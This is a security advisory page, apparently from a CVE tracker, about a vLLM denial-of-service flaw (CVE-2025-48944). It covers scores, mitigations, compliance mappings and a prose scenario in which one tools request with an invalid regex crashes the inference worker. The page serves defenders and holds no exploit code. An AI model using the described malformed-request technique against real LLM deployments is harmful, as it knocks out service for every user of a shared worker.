CVE-2025-48944 — MEDIUM (CVSS 6.5) AI Security Vulnerability

Q: Is CVE-2025-48944 actively exploited?

Proof-of-concept exploit code is publicly available for CVE-2025-48944, increasing the risk of exploitation.

Q: How to fix CVE-2025-48944?

1) Upgrade vLLM to 0.9.0 immediately—this is the only complete fix. 2) If patching is blocked, restrict /v1/chat/completions tools functionality to trusted internal principals at the API gateway level, or disable it entirely. 3) Implement automatic worker restart via systemd watchdog, Kubernetes liveness probes, or equivalent to minimize MTTR if exploitation occurs. 4) Add API gateway or WAF rules to validate and reject structurally malformed 'pattern' and 'type' fields in tool definitions before they reach the inference worker. 5) Alert on unexpected vLLM worker process terminations—treat crashes as potential exploitation indicators.

Q: What systems are affected by CVE-2025-48944?

This vulnerability affects the following AI/ML architecture patterns: LLM inference serving, agent frameworks, function-calling pipelines, model serving APIs, RAG pipelines with tool use.

Q: What is the CVSS score for CVE-2025-48944?

CVE-2025-48944 has a CVSS v3.1 base score of 6.5 (MEDIUM). The EPSS exploitation probability is 0.32%.

CISO Take

Any authenticated API user can crash a vLLM inference worker with a single malformed tools request, causing service outage until manually restarted. Low-privilege access requirement makes this a realistic insider or compromised-credential threat in multi-tenant LLM deployments. Patch to vLLM 0.9.0 immediately—there is no safe workaround short of disabling tools functionality entirely.

Risk Assessment

Medium-high operational risk despite the CVSS 6.5 score. Attack complexity is low and only low-privilege API credentials are required, making exploitation trivial for any user with API access. The impact is total disruption of the affected inference worker with no automatic recovery—manual intervention required each time. Organizations running vLLM 0.8.x with the tools API exposed face persistent availability risk from any authenticated principal, internal or external.

Affected Systems

Package	Ecosystem	Vulnerable Range	Patched
vllm	pip	—	No patch
78.9K 126 dependents Pushed 6d ago 56% patched ~32d to patch Full package profile →
vllm	pip	>= 0.8.0, < 0.9.0	`0.9.0`
78.9K 126 dependents Pushed 6d ago 56% patched ~32d to patch Full package profile →

Severity & Risk

CVSS 3.1

6.5 / 10

EPSS

0.3%

chance of exploitation in 30 days

Higher than 55% of all CVEs

Source: EPSS v3 — FIRST.org

Exploitation Status

Exploit Available

Exploitation: MEDIUM

Sophistication

Trivial

Exploitation Confidence

medium

○ CISA SSVC: Public PoC

○ Public PoC indexed (trickest/cve)

Composite signal derived from CISA KEV, CISA SSVC, EPSS, trickest/cve, and Nuclei templates.

Attack Surface

AV Network

AC Low

PR Low

UI None

S Unchanged

C None

I None

A High

Recommended Action

1 step

1) Upgrade vLLM to 0.9.0 immediately—this is the only complete fix. 2) If patching is blocked, restrict /v1/chat/completions tools functionality to trusted internal principals at the API gateway level, or disable it entirely. 3) Implement automatic worker restart via systemd watchdog, Kubernetes liveness probes, or equivalent to minimize MTTR if exploitation occurs. 4) Add API gateway or WAF rules to validate and reject structurally malformed 'pattern' and 'type' fields in tool definitions before they reach the inference worker. 5) Alert on unexpected vLLM worker process terminations—treat crashes as potential exploitation indicators.

CISA SSVC Assessment

Decision Track*

Exploitation poc

Automatable No

Technical Impact partial

Source: CISA Vulnrichment (SSVC v2.0). Decision based on the CISA Coordinator decision tree.

Classification

DoS Inference API Framework AML.T0029 - Denial of AI Service AML.T0034 - Cost Harvesting AML.T0049 - Exploit Public-Facing Application

Compliance Impact

This CVE is relevant to:

EU AI Act

Art. 15 - Accuracy, robustness and cybersecurity

ISO 42001

8.1 - Operational planning and control

NIST AI RMF

MANAGE 2.2 - Mechanisms to sustain AI system performance

OWASP LLM Top 10

LLM04 - Model Denial of Service

Frequently Asked Questions

What is CVE-2025-48944?

Any authenticated API user can crash a vLLM inference worker with a single malformed tools request, causing service outage until manually restarted. Low-privilege access requirement makes this a realistic insider or compromised-credential threat in multi-tenant LLM deployments. Patch to vLLM 0.9.0 immediately—there is no safe workaround short of disabling tools functionality entirely.

Is CVE-2025-48944 actively exploited?

Proof-of-concept exploit code is publicly available for CVE-2025-48944, increasing the risk of exploitation.

How to fix CVE-2025-48944?

1) Upgrade vLLM to 0.9.0 immediately—this is the only complete fix. 2) If patching is blocked, restrict /v1/chat/completions tools functionality to trusted internal principals at the API gateway level, or disable it entirely. 3) Implement automatic worker restart via systemd watchdog, Kubernetes liveness probes, or equivalent to minimize MTTR if exploitation occurs. 4) Add API gateway or WAF rules to validate and reject structurally malformed 'pattern' and 'type' fields in tool definitions before they reach the inference worker. 5) Alert on unexpected vLLM worker process terminations—treat crashes as potential exploitation indicators.

What systems are affected by CVE-2025-48944?

This vulnerability affects the following AI/ML architecture patterns: LLM inference serving, agent frameworks, function-calling pipelines, model serving APIs, RAG pipelines with tool use.

What is the CVSS score for CVE-2025-48944?

CVE-2025-48944 has a CVSS v3.1 base score of 6.5 (MEDIUM). The EPSS exploitation probability is 0.32%.

Technical Details

NVD Description

vLLM is an inference and serving engine for large language models (LLMs). In version 0.8.0 up to but excluding 0.9.0, the vLLM backend used with the /v1/chat/completions OpenAPI endpoint fails to validate unexpected or malformed input in the "pattern" and "type" fields when the tools functionality is invoked. These inputs are not validated before being compiled or parsed, causing a crash of the inference worker with a single request. The worker will remain down until it is restarted. Version 0.9.0 fixes the issue.

Exploitation Scenario

An attacker with basic API credentials—or a compromised low-privilege service account—sends a single POST request to /v1/chat/completions with a crafted 'tools' array containing a malformed 'pattern' field (e.g., an invalid regex that fails to compile) or a structurally invalid 'type' annotation. The vLLM backend attempts to compile or parse this input without prior validation, triggering an unhandled exception that terminates the inference worker process. The LLM service is fully unavailable until an operator manually restarts the worker. In a shared or multi-tenant LLM platform, a single request denies service to all downstream users of that worker. The attack requires no AI/ML expertise—only knowledge of the OpenAI-compatible tools API schema.